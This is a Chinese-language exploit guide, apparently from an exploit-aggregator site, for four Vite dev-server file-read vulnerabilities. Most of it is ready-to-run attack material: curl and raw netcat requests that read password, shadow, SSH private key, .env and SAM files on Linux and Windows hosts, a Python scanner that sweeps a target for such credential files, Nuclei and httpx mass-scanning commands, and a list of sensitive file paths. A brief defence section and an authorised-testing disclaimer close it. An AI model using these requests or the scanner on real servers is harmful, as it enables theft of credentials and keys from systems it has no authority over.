Share
## https://sploitus.com/exploit?id=7B4E700B-260D-5A04-975D-FA921DFAD1B3
# Vite漏洞利用指南 (CVE-2025-30208/31125/31486/32395)
本文档总结了Vite开发服务器中四个任意文件读取漏洞的利用方法,包括Linux和Windows系统的示例。**请注意:仅限在授权的安全测试环境中使用。**
## 基本原理
Vite开发服务器中的这四个漏洞都允许攻击者绕过`server.fs.deny`限制,读取服务器上的任意文件。每个漏洞使用不同的绕过技术,但基本原理相似。
## 影响条件
所有四个漏洞都需要满足以下条件才能被利用:
1. 目标使用了受影响版本的Vite开发服务器
2. 开发服务器被显式暴露到网络(使用`--host`或`server.host`配置选项)
3. 对于CVE-2025-32395,还需要服务器运行在Node或Bun(非Deno)环境
## 漏洞利用方法
### 1. CVE-2025-30208 (尾部分隔符绕过)
**影响版本**: < 6.2.3, < 6.1.2, < 6.0.12, < 5.4.15, < 4.5.10
**修复版本**: 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10
**利用原理**: 通过在URL中添加`?raw??`或`?import&raw??`查询参数,绕过`@fs`路径限制。这是因为尾部分隔符(如`?`)在多个地方被移除,但在查询字符串正则表达式中未被考虑到。
**Linux系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/etc/passwd?raw??"
curl "http://[目标IP]:5173/@fs/etc/passwd?import&raw??"
curl "http://[目标IP]:5173/@fs/var/log/auth.log?raw??"
curl "http://[目标IP]:5173/@fs/home/[用户名]/.ssh/id_rsa?raw??"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误
curl "http://[目标IP]:5173/@fs/etc/passwd?raw??" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?raw??"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/Desktop/credentials.txt?raw??"
curl "http://[目标IP]:5173/@fs/C:/inetpub/wwwroot/web.config?raw??"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini" # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??" # 如果返回文件内容,则存在漏洞
```
### 2. CVE-2025-31125 (特定导入方法绕过)
**影响版本**: 与CVE-2025-30208相同
**修复版本**: 与CVE-2025-30208相同
**利用原理**: 通过使用特定的导入方法,如`?inline&import`或`?raw?import`,绕过`server.fs.deny`配置。
**Linux系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import"
curl "http://[目标IP]:5173/@fs/etc/passwd?raw?import"
curl "http://[目标IP]:5173/@fs/etc/shadow?inline&import"
curl "http://[目标IP]:5173/@fs/proc/self/environ?inline&import"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误
curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Program Files/MySQL/MySQL Server 8.0/my.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt?inline&import"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini" # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import" # 如果返回文件内容,则存在漏洞
```
### 3. CVE-2025-31486 (SVG和相对路径绕过)
**影响版本**: < 6.2.5, < 6.1.4, < 6.0.14, < 5.4.17, < 4.5.12
**修复版本**: 6.2.5, 6.1.4, 6.0.14, 5.4.17, 4.5.12
**利用原理**:
1. **SVG绕过**: 通过添加`?.svg?.wasm?init`或使用`sec-fetch-dest: script`头,绕过对`.svg`文件的限制检查
2. **相对路径绕过**: 利用ID规范化前的检查漏洞,使用相对路径(如`../../`)绕过限制
**Linux系统利用示例**:
```bash
# SVG绕过方法
curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/etc/passwd?.svg"
curl "http://[目标IP]:5173/etc/nginx/nginx.conf?.svg?.wasm?init"
curl "http://[目标IP]:5173/var/www/html/config.php?.svg?.wasm?init"
# 相对路径绕过方法
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../var/log/auth.log?import&?raw"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/etc/passwd" # 应返回404错误
curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# SVG绕过方法
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/C:/Windows/win.ini?.svg"
curl "http://[目标IP]:5173/C:/inetpub/wwwroot/web.config?.svg?.wasm?init"
curl "http://[目标IP]:5173/C:/Windows/Panther/Unattend.xml?.svg?.wasm?init"
# 相对路径绕过方法
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/system32/drivers/etc/hosts?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Users/Administrator/Desktop/credentials.txt?import&?raw"
# 验证漏洞是否存在
curl "http://[目标IP]:5173/C:/Windows/win.ini" # 应返回404错误
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init" # 如果返回文件内容,则存在漏洞
```
**注意**: SVG绕过仅在文件小于`build.assetsInlineLimit`(默认4kB)且使用Vite 6.0+时有效。
### 4. CVE-2025-32395 (无效请求目标绕过)
**影响版本**: < 6.2.6, < 6.1.5, < 6.0.15, < 5.4.18, < 4.5.13
**修复版本**: 6.2.6, 6.1.5, 6.0.15, 5.4.18, 4.5.13
**利用原理**: 利用HTTP 1.1规范中不允许在`request-target`中使用`#`字符的特性。在Node和Bun运行时中,这些请求不会被内部拒绝,`http.IncomingMessage.url`包含`#`,而Vite在检查`server.fs.deny`时假设`req.url`不会包含`#`。
**Linux系统利用示例**:
```bash
# 使用curl的--request-target选项
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../var/www/html/wp-config.php" "http://[目标IP]:5173"
# 或使用原始HTTP请求
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误
curl --request-target "/@fs/x/#/../../../../../etc/passwd" "http://[目标IP]:5173" # 如果返回文件内容,则存在漏洞
```
**Windows系统利用示例**:
```bash
# 使用curl的--request-target选项
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Windows/win.ini" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Windows/system32/drivers/etc/hosts" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/inetpub/wwwroot/web.config" "http://[目标IP]:5173"
curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf" "http://[目标IP]:5173"
# 或使用原始HTTP请求
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Windows/win.ini HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173
# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini" # 应返回403错误
curl --request-target "/@fs/x/#/../../../../../C:/Windows/win.ini" "http://[目标IP]:5173" # 如果返回文件内容,则存在漏洞
```
**注意**: 此漏洞仅影响在Node或Bun(非Deno)环境中运行的Vite服务器。
## 综合利用脚本
以下Python脚本可以自动检测目标是否存在这四个漏洞中的任何一个,并包含更多测试路径:
```python
#!/usr/bin/env python3
#This script is made by "nkuty"
import requests
import argparse
import sys
import socket
import random
import string
import urllib.parse
from urllib3.exceptions import InsecureRequestWarning
# 禁用SSL警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def check_vite_vulnerabilities(target_url):
if not target_url.startswith('http' ):
target_url = f"http://{target_url}"
if target_url.endswith('/' ):
target_url = target_url[:-1]
# 解析URL获取主机和端口
parsed_url = urllib.parse.urlparse(target_url)
host = parsed_url.hostname
port = parsed_url.port
# 如果端口未指定,根据协议设置默认端口
if port is None:
port = 443 if parsed_url.scheme == 'https' else 80
print(f"[*] 测试目标: {target_url} (主机: {host}, 端口: {port} )")
# 扩展的Linux测试路径
linux_test_paths = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/etc/nginx/nginx.conf",
"/var/www/html/config.php",
"/var/www/html/wp-config.php",
"/home/admin/.ssh/id_rsa",
"/home/ubuntu/.ssh/id_rsa",
"/root/.ssh/id_rsa",
"/proc/self/environ",
"/var/log/auth.log",
"/etc/crontab",
"/etc/mysql/my.cnf",
"/var/www/html/.env",
"/opt/tomcat/conf/server.xml"
]
# 扩展的Windows测试路径
windows_test_paths = [
"C:/Windows/win.ini",
"C:/Windows/system32/drivers/etc/hosts",
"C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt",
"C:/inetpub/wwwroot/web.config",
"C:/Program Files/MySQL/MySQL Server 8.0/my.ini",
"C:/Users/Administrator/.ssh/id_rsa",
"C:/Windows/Panther/Unattend.xml",
"C:/xampp/php/php.ini",
"C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf",
"C:/Users/Administrator/Desktop/credentials.txt",
"C:/ProgramData/MySQL/MySQL Server 8.0/Data/ibdata1",
"C:/Windows/System32/config/SAM",
"C:/Windows/repair/SAM",
"C:/Windows/debug/NetSetup.log",
"C:/Windows/iis6.log"
]
# 所有测试路径
all_test_paths = linux_test_paths + windows_test_paths
vulnerabilities = {
"CVE-2025-30208": [
"/@fs{path}?raw??",
"/@fs{path}?import&raw??"
],
"CVE-2025-31125": [
"/@fs{path}?inline&import",
"/@fs{path}?raw?import"
],
"CVE-2025-31486": [
"{path}?.svg?.wasm?init",
"/@fs/x/x/x/vite-project/?/../../../../../{path}?import&?raw"
],
"CVE-2025-32395": [
"/@fs/x/#/../../../../../{path}"
]
}
# 首先测试基本路径是否可访问
try:
r = requests.get(f"{target_url}/@vite/client", timeout=5, verify=False)
if r.status_code != 200:
print(f"[-] 目标可能不是Vite服务器,未找到/@vite/client路径")
# 尝试其他可能的Vite标识
r = requests.get(f"{target_url}", timeout=5, verify=False)
if "vite" not in r.text.lower() and "dev server" not in r.text.lower():
print(f"[-] 目标页面内容中未找到Vite相关标识")
print(f"[*] 继续测试漏洞,忽略Vite标识检查...")
else:
print(f"[+] 确认目标是Vite服务器")
except Exception as e:
print(f"[-] 连接错误: {e}")
print(f"[*] 继续测试漏洞,忽略连接错误...")
# 生成随机文件名用于测试不存在的文件(避免误报)
random_filename = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
random_test = f"/tmp/{random_filename}.txt"
# 测试CVE-2025-32395(需要自定义HTTP请求)
def test_cve_2025_32395(path):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
# 根据协议构建请求
protocol = "HTTP/1.1"
request = f"GET /@fs/x/#/../../../../../{path} {protocol}\r\nHost: {host}:{port}\r\nConnection: close\r\n\r\n"
# 如果是HTTPS,需要包装SSL
if parsed_url.scheme == 'https':
import ssl
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT )
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
s = context.wrap_socket(s, server_hostname=host)
s.send(request.encode())
response = b""
while True:
chunk = s.recv(4096)
if not chunk:
break
response += chunk
s.close()
response_text = response.decode('utf-8', errors='ignore')
# 检查是否成功读取文件
if "HTTP/1.1 200" in response_text:
content = response_text.split('\r\n\r\n')[1] if '\r\n\r\n' in response_text else ""
if is_valid_file_content(path, content):
print(f"[+] 发现漏洞 CVE-2025-32395! 路径: {path}")
print(f"[+] 响应内容预览: {content[:100]}...")
return True
except Exception as e:
print(f"[-] 测试 CVE-2025-32395 路径 {path} 时出错: {e}")
return False
# 检查文件内容是否有效
def is_valid_file_content(path, content):
if not content:
return False
# 根据文件类型检查内容特征
if "passwd" in path and ("root:" in content or "nobody:" in content):
return True
elif "shadow" in path and ("root:" in content or "$" in content):
return True
elif "win.ini" in path and ("for 16-bit app support" in content or "[fonts]" in content):
return True
elif "hosts" in path and ("localhost" in content or "127.0.0.1" in content):
return True
elif ".ssh/id_rsa" in path and ("BEGIN" in content and "PRIVATE KEY" in content):
return True
elif "web.config" in path and ("<configuration" in content or "<connectionStrings" in content):
return True
elif ".php" in path and ("<?php" in content or "$" in content):
return True
elif ".env" in path and ("=" in content):
return True
elif ".xml" in path and ("<" in content and ">" in content):
return True
elif ".ini" in path and ("[" in content and "]" in content):
return True
elif ".log" in path and (len(content) > 10):
return True
elif ".txt" in path and (len(content) > 5):
return True
elif ".mdf" in path and (not content.isprintable()): # 二进制文件
return True
# 通用检查:内容不为空且不是错误消息
return len(content) > 10 and "error" not in content.lower() and "not found" not in content.lower()
# 测试所有漏洞和路径
found_vulnerabilities = []
# 首先测试CVE-2025-32395,因为它需要特殊处理
for path in all_test_paths:
if test_cve_2025_32395(path):
found_vulnerabilities.append(("CVE-2025-32395", path))
break
# 测试其他漏洞
for cve, templates in vulnerabilities.items():
if cve == "CVE-2025-32395":
continue # 已经测试过了
for path in all_test_paths:
for template in templates:
try:
url = f"{target_url}{template.format(path=path)}"
r = requests.get(url, timeout=5, verify=False)
if r.status_code == 200 and is_valid_file_content(path, r.text):
print(f"[+] 发现漏洞 {cve}! 路径: {path}, 模板: {template}")
print(f"[+] 响应内容预览: {r.text[:100]}...")
found_vulnerabilities.append((cve, path))
break
except Exception as e:
print(f"[-] 测试 {cve} 路径 {path} 模板 {template} 时出错: {e}")
if any(cve == v[0] for v in found_vulnerabilities):
break # 如果已经找到这个CVE的漏洞,就不再测试其他路径
# 测试随机文件名以验证是否存在误报
false_positives = []
for cve, templates in vulnerabilities.items():
if cve == "CVE-2025-32395":
continue
for template in templates:
try:
url = f"{target_url}{template.format(path=random_test)}"
r = requests.get(url, timeout=5, verify=False)
if r.status_code == 200 and len(r.text) > 10:
false_positives.append(cve)
break
except:
pass
# 报告结果
if found_vulnerabilities:
print("\n[+] 漏洞检测结果:")
for cve, path in found_vulnerabilities:
if cve in false_positives:
print(f" [-] {cve}: 可能存在误报,请手动验证")
else:
print(f" [+] {cve}: 确认存在漏洞,可访问 {path}")
return True
else:
print("[-] 未发现漏洞或目标已修复")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Vite漏洞检测工具')
parser.add_argument('target', help='目标URL,例如: python3 vite_vulnerability_scanner.py http://example.com:5173' )
args = parser.parse_args()
check_vite_vulnerabilities(args.target)
```
>## 脚本使用方法
>
>1. **保存脚本**:
>
> - 将脚本内容复制到一个新文件中,例如命名为`vite_vulnerability_scanner.py`
> - 确保保存为UTF-8编码
>
>2. **安装依赖**:
>
> ```
> pip install requests argparse urllib3
> ```
>
>3. **赋予执行权限**(Linux/Mac系统):
>
> ```
> chmod +x vite_vulnerability_scanner.py
> ```
>
>4. **运行脚本**:
>
> ```
> # 基本用法
> python3 vite_vulnerability_scanner.py http://目标IP:5173
>
> # 或者如果您已赋予执行权限
> ./vite_vulnerability_scanner.py http://目标IP:5173
> ```
>
>5. **查看帮助**:
>
> ```
> python vite_vulnerability_scanner.py -h
> ```
## 常见敏感文件路径
### Linux系统
```
/etc/passwd # 用户账户信息
/etc/shadow # 密码哈希(需要权限)
/etc/hosts # 主机映射
/etc/nginx/nginx.conf # Nginx配置
/etc/apache2/apache2.conf # Apache配置
/var/www/html/config.php # PHP配置文件
/var/www/html/wp-config.php # WordPress配置
/var/www/html/.env # 环境变量文件
/home/[用户名]/.ssh/id_rsa # SSH私钥
/home/[用户名]/.bash_history # Bash历史命令
/proc/self/environ # 进程环境变量
/var/log/auth.log # 认证日志
/etc/crontab # 定时任务
/etc/mysql/my.cnf # MySQL配置
/opt/tomcat/conf/server.xml # Tomcat配置
/etc/redis/redis.conf # Redis配置
/var/lib/jenkins/secrets/ # Jenkins密钥
/var/www/html/application/config/database.php # CodeIgniter数据库配置
/var/www/html/sites/default/settings.php # Drupal配置
```
### Windows系统
```
C:/Windows/win.ini # Windows基本信息
C:/Windows/system32/drivers/etc/hosts # 主机映射
C:/Windows/Panther/Unattend.xml # 安装配置(可能包含凭据)
C:/Windows/System32/config/SAM # 用户账户数据库(需要权限)
C:/Windows/repair/SAM # SAM备份(可能存在)
C:/Windows/debug/NetSetup.log # 网络设置日志
C:/inetpub/wwwroot/web.config # IIS网站配置
C:/inetpub/logs/LogFiles/ # IIS日志
C:/Program Files/MySQL/MySQL Server 8.0/my.ini # MySQL配置
C:/xampp/php/php.ini # XAMPP PHP配置
C:/Users/[用户名]/.ssh/id_rsa # SSH私钥
C:/Users/[用户名]/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt # PowerShell历史
C:/Users/[用户名]/AppData/Roaming/Microsoft/Credentials/ # 存储的凭据
C:/Users/[用户名]/AppData/Local/Microsoft/Windows/INetCache/ # IE/Edge缓存
C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf # SQL Server数据文件
C:/ProgramData/MySQL/MySQL Server 8.0/Data/ibdata1 # MySQL数据文件
C:/Users/Administrator/Desktop/credentials.txt # 可能的凭据文件
C:/Windows/System32/inetsrv/config/applicationHost.config # IIS应用程序配置
C:/Windows/iis6.log # IIS日志
```
## 漏洞检测工具
除了上述Python脚本,还可以使用以下工具检测这些漏洞:
1. **Nuclei模板**:
```yaml
id: vite-file-read-vulnerabilities
info:
name: Vite Development Server - Arbitrary File Read
author: security-researcher
severity: high
description: Detects multiple arbitrary file read vulnerabilities in Vite development server
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-30208
- https://nvd.nist.gov/vuln/detail/CVE-2025-31486
- https://nvd.nist.gov/vuln/detail/CVE-2025-32395
requests:
- method: GET
path:
# Linux路径
- "{{BaseURL}}/@fs/etc/passwd?raw??"
- "{{BaseURL}}/@fs/etc/passwd?import&raw??"
- "{{BaseURL}}/@fs/etc/passwd?inline&import"
- "{{BaseURL}}/@fs/etc/passwd?raw?import"
- "{{BaseURL}}/etc/passwd?.svg?.wasm?init"
- "{{BaseURL}}/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw"
# Windows路径
- "{{BaseURL}}/@fs/C:/Windows/win.ini?raw??"
- "{{BaseURL}}/@fs/C:/Windows/win.ini?import&raw??"
- "{{BaseURL}}/@fs/C:/Windows/win.ini?inline&import"
- "{{BaseURL}}/@fs/C:/Windows/win.ini?raw?import"
- "{{BaseURL}}/C:/Windows/win.ini?.svg?.wasm?init"
- "{{BaseURL}}/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
matchers-condition: or
matchers:
# Linux文件内容匹配
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Windows文件内容匹配
- type: word
words:
- "for 16-bit app support"
- "[fonts]"
condition: or
part: body
# 通用匹配
- type: word
words:
- "export default"
condition: and
part: body
```
2. **使用httpx**:
```bash
# Linux路径测试
cat targets.txt | httpx -path "/@fs/etc/passwd?raw??" -mc 200 -match-regex "root:"
cat targets.txt | httpx -path "/@fs/etc/shadow?raw??" -mc 200 -match-regex "\$"
cat targets.txt | httpx -path "/etc/passwd?.svg?.wasm?init" -mc 200 -match-regex "root:"
# Windows路径测试
cat targets.txt | httpx -path "/@fs/C:/Windows/win.ini?raw??" -mc 200 -match-regex "for 16-bit app support"
cat targets.txt | httpx -path "/@fs/C:/Windows/system32/drivers/etc/hosts?raw??" -mc 200 -match-regex "localhost"
cat targets.txt | httpx -path "/C:/Windows/win.ini?.svg?.wasm?init" -mc 200 -match-regex "for 16-bit app support"
```
## 防御措施
1. **立即更新Vite**:
- 升级到6.2.6+、6.1.5+、6.0.15+、5.4.18+或4.5.13+
2. **限制网络暴露**:
- 不要在生产环境中使用Vite开发服务器
- 避免使用`--host`或`server.host`配置选项
- 如必须暴露,使用防火墙限制访问IP
3. **配置增强**:
- 使用`server.fs.strict: true`
- 明确配置`server.fs.allow`和`server.fs.deny`列表
- 考虑使用`server.fs.deny: ['**']`完全禁止文件系统访问
4. **运行时安全**:
- 考虑在Deno而非Node/Bun上运行Vite(根据CVE-2025-32395的发现)
- 使用最小权限原则运行Vite服务
**免责声明**:本文档仅供授权安全测试和教育目的使用。未经授权对系统进行测试是违法的。